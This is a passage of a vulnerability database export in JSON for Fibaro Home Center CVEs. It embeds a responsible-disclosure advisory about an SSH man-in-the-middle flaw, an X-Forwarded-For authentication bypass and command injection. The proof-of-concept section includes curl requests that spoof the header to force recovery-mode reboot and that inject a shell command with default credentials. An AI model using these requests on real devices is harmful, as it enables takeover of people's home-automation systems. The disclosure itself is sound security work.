                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2021-20992",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20992",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20992",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1332",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20992",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "In Fibaro Home Center 2 and Lite devices in all versions provide a web based management interface over unencrypted HTTP protocol. Communication between the user and the device can be eavesdropped to hijack sessions, tokens and passwords. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. 250 employees.\"\n\n \n\nhttps://www.fibaro.com/en/about-us/\n\n \n\n \n\nVulnerability overview/description:\n\n-----------------------------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)\n\nHome Center devices initiate SSH connections to the Fibaro cloud to provide \n\nremote access and remote support capabilities. This connection can be \n\nintercepted using a man-in-the-middle attack and a device initiated remote \n\nport-forward channel can be used to connect to the web management interface. \n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\n \n\nProof of concept:\n\n-----------------\n\n1) Cloud SSH Connection Man-in-the-Middle Attack\n\n \n\nHome Center devices initiate a SSH connection to the Fibaro cloud\n\n \n\n \n\n./etc/init.d/fibaro/RemoteAccess\n\n \n\n\u003csnip\u003e\n\nDAEMON=/usr/bin/ssh\n\n \n\n.... \n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... \n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. Once the connection is authenticated, the client initiates a\nremote \n\nport-forward:\n\n-R \"${PORT_Response}\":localhost:80\n\n \n\nThis enables the attacker to access port 80 (management interface) of the \n\ndevice. \n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. \n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. \n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. \n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    setStatusAccepted();\n\n}\n\n\u003c/snip\u003e\n\n \n\nThe parameter $version is not sanitized or escaped, which allows an attacker\nto \n\ninject shell commands into the exec() call:\n\n \n\ncat \u003e /tmp/exploit \u003c\u003c- EOM\n\n{\"action\": \"restore\", \"params\": {\"type\": \"remote\", \"id\": 1, \"version\": \"1;\nINJECTED COMMAND\"}}\n\nEOM\n\n \n\ncurl -H \u0027Authorization: Basic YWRtaW46YWRtaW4=\u0027 -H \u0027content-type:\napplication/json\u0027 -d@/tmp/exploit  http://DEVICE/services/system/backups.php\n\n\n \n\nVersion 4.550 and later have proper escaping:\n\n\u003csnip\u003e\n\n    $version = escapeshellarg($params-\u003eversion);\n\n\u003c/snip\u003e\n\n \n\n \n\n4) Unencrypted management interface\n\n \n\nNMMAP shows a few open ports on the box:\n\nPORT     STATE SERVICE\n\n22/tcp   open  ssh\n\n80/tcp   open  http\n\n8000/tcp open  http-alt\n\n \n\nBoth 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. \n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVulnerable / tested versions:\n\n-----------------------------\n\nVulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest\nversion \n\nat the time of the discovery\n\nVulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530\n\n \n\nSolution:\n\n---------\n\nUpgrade to the version 4.610 or latest version, which fixes vulnerabilities\n1, \n\n2 and 3. \n\n \n\nVulnerability 4 is not fixed as the vendor assumes that the local network is\n\n\ntrusted and the device only provides wired network access. Furthermore, the \n\nvendor recommends using the cloud-based management interface, which is \n\naccessible over HTTPS and requests are forwarded via an encrypted SSH \n\nconnection between the Fibaro cloud and the device. \n\n \n\n \n\nAdvisory URL:\n\n-------------\n\nhttps://www.iot-inspector.com/blog/advisory-fibaro-home-center/\n\n \n\n \n\nVendor contact timeline:\n\n------------------------\n\n2020-11-18: Contacting Fibaro through support@fibaro.com, \n\n            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com\n\n2020-11-23: Contacting Fibaro on Facebook \u0026 LinkedIn, got response on\nLinkedIn\n\n2020-11-24: Adivsory sent to Fibaro by email\n\n2020-12-01: Fibaro confirmed the receipt of the advisory\n\n2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes\n\n2021-03-16: Fibaro beta release (4.601) with the fixes\n\n2021-03-24: Fibaro applies for CVE numbers\n\n2021-03-31: Fibaro GA release (4.610) with the fix\n\n2021-04-08: IoT Inspector Research Lab publishes advisory\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nThe IoT Inspector Research Lab is an integrated part of IoT Inspector. \n\n \n\nIoT Inspector is a platform for automated security analysis and compliance \n\nchecks of IoT firmware. Our mission is to secure the Internet of Things. In \n\norder to discover vulnerabilities and vulnerability patterns within IoT\ndevices\n\nand to further enhance automated identification that allows for scalable \n\ndetection within IoT Inspector, we conduct excessive security research in\nthe\n\narea of IoT. \n\n \n\nWhenever the IoT Inspector Research Lab discovers vulnerabilities in IoT \n\nfirmware, we aim to responsibly disclose relevant information to the vendor\n\nof the affected IoT device as well as the general public in a way that \n\nminimizes potential harm and encourages further security analyses of IoT \n\nsystems. \n\n \n\nYou can find our responsible disclosure policy here:\n\nhttps://www.iot-inspector.com/responsible-disclosure-policy/\n\n \n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nInterested in using IoT Inspector for your research or product?\n\n \n\nMail: research at iot-inspector dot com\n\nWeb: https://www.iot-inspector.com\n\nBlog: https://www.iot-inspector.com/blog/\n\nTwitter: https://twitter.com/iotinspector\n\n \n\nEOF Marton Illes / @2021\n\n \n\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          }
        ],
        "trust": 1.08
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "PACKETSTORM",
            "id": "162243",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992",
            "trust": 1.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-20992",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "id": "VAR-202104-0490",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.5
      },
      "last_update_date": "2024-11-23T22:05:09.427000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Fibaro Home Center 2 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147743"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-319",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "https://www.iot-inspector.com/blog/advisory-fibaro-home-center/"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/27"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162243/fibaro-home-center-mitm-missing-authentication-code-execution.html"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20992"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/319.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_ip.php?pk_accesspoint=${hc2_seria"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20990"
          },
          {
            "trust": 0.1,
            "url": "https://securelist.com/fibaro-smart-home/91416/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/responsible-disclosure-policy/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/"
          },
          {
            "trust": 0.1,
            "url": "https://www.iot-inspector.com/blog/"
          },
          {
            "trust": 0.1,
            "url": "http://device:8000/services/system/reboot.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20991"
          },
          {
            "trust": 0.1,
            "url": "http://127.0.0.1:8000;"
          },
          {
            "trust": 0.1,
            "url": "https://twitter.com/iotinspector"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_support_route.php?pk_accesspoint=\u0027"
          },
          {
            "trust": 0.1,
            "url": "http://device/services/system/backups.php"
          },
          {
            "trust": 0.1,
            "url": "https://dom.fibaro.com/get_ssh_port.php?pk_accesspoint=${hc2_s"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20989"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/en/about-us/"
          },
          {
            "trust": 0.1,
            "url": "https://www.fibaro.com/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "date": "2021-04-20T16:14:10",
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "date": "2021-04-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "date": "2021-04-19T14:15:11.883000",
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-20992"
          },
          {
            "date": "2021-04-25T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          },
          {
            "date": "2024-11-21T05:47:20.957000",
            "db": "NVD",
            "id": "CVE-2021-20992"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "162243"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Fibaro Home Center 2 Security hole",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.6
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1332"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0489

    Vulnerability from variot - Updated: 2024-11-23 22:05

    In Fibaro Home Center 2 and Lite devices with firmware version 4.540 and older an authenticated user can run commands as root user using a command injection vulnerability. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities 
    
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
    
                        https://www.fibaro.com/
    
    vulnerable version: 4.600 and older
    
         fixed version: 4.610
    
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, 
    
                        CVE-2021-20992
    
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        9.8 (critical)
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
              reported: 2020-11-18
    
           publication: 2021-04-08
    
                    by: Marton Illes, IoT Inspector Research Lab
    
                        https://www.iot-inspector.com/
    
    
    
    
    
    
    
    Vendor description:
    
    -------------------
    
    "FIBARO is a global brand based on the Internet of Things technology. It 
    
    provides solutions for building and home automation. FIBARO's headquarters
    
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    
    employs app. 250 employees."
    
    
    
    https://www.fibaro.com/en/about-us/
    
    
    
    
    
    Vulnerability overview/description:
    
    -----------------------------------
    
    1) Cloud SSH Connection Man-in-the-Middle Attack (CVE-2021-20989)
    
    Home Center devices initiate SSH connections to the Fibaro cloud to provide 
    
    remote access and remote support capabilities. This connection can be 
    
    intercepted using a man-in-the-middle attack and a device initiated remote 
    
    port-forward channel can be used to connect to the web management interface. 
    
    
    IoT Inspector identified a disabled SSH host key check, which enables 
    
    man-in-the-middle attacks. 
    
    
    
    By initiating connections to the Fibaro cloud an attacker can eavesdrop on 
    
    communication between the user and the device. As communication inside the 
    
    SSH port-forward is not encrypted (see #4 on management interface), user 
    
    sessions, tokens and passwords can be hijacked. 
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode 
    
    (CVE-2021-20990)
    
    An internal management service is accessible on port 8000 and some API 
    
    endpoints could be accessed without authentication to trigger a shutdown, a 
    
    reboot, or a reboot into recovery mode. In recovery mode, an attacker can 
    
    upload firmware without authentication. 
    
    Similar problems were also discovered by Pavel Cheremushkin from Kaspersky 
    
    ICS Cert: https://securelist.com/fibaro-smart-home/91416/
    
    
    
    4) Unencrypted management interface (CVE-2021-20992)
    
    Home Center devices provide a web based management interface over
    unencrypted 
    
    HTTP protocol. Communication between the user and the device can be 
    
    eavesdropped to hijack sessions, tokens, and passwords. The management 
    
    interface is only available over HTTP on the local network. The vendor 
    
    recommends using the cloud-based management interface, which is accessible
    over 
    
    HTTPS and requests are forwarded via an encrypted SSH connection between the
    
    
    Fibaro cloud and the device. 
    
    
    
    
    
    Proof of concept:
    
    -----------------
    
    1) Cloud SSH Connection Man-in-the-Middle Attack
    
    
    
    Home Center devices initiate a SSH connection to the Fibaro cloud
    
    
    
    
    
    ./etc/init.d/fibaro/RemoteAccess
    
    
    
    <snip>
    
    DAEMON=/usr/bin/ssh
    
    
    
    .... 
    
    
    
    case "$1" in
    
      start)
    
    
    
                    ..... 
    
    
    
        # get IP
    
        local
    GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria
    l}&HW_Key=${HW_Key}"
    
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
        # get PORT
    
        local
    GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S
    erial}&HW_Key=${HW_Key}"
    
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
                    .... 
    
    
    
        start-stop-daemon --start --background --pidfile "${PIDFILE}"
    --make-pidfile --startas /usr/bin/screen \
    
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80
    remote2@"${IP_Response}"
    
    </snip>
    
    
    
    The device uses dropbear ssh to initiate the connection; option -y disables
    any 
    
    host-key checks, voiding much of the otherwise added transport-layer
    security 
    
    by SSH: "Always accept hostkeys if they are unknown."
    
    
    
    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: 
    
    lb-1.eu.ra.fibaro.com
    
    
    
    An attacker can use DNS spoofing or other means to intercept the connection. 
    By 
    
    using any hostkey, the attacker can successfully authenticate the SSH 
    
    connection. Once the connection is authenticated, the client initiates a
    remote 
    
    port-forward:
    
    -R "${PORT_Response}":localhost:80
    
    
    
    This enables the attacker to access port 80 (management interface) of the 
    
    device. 
    
    
    
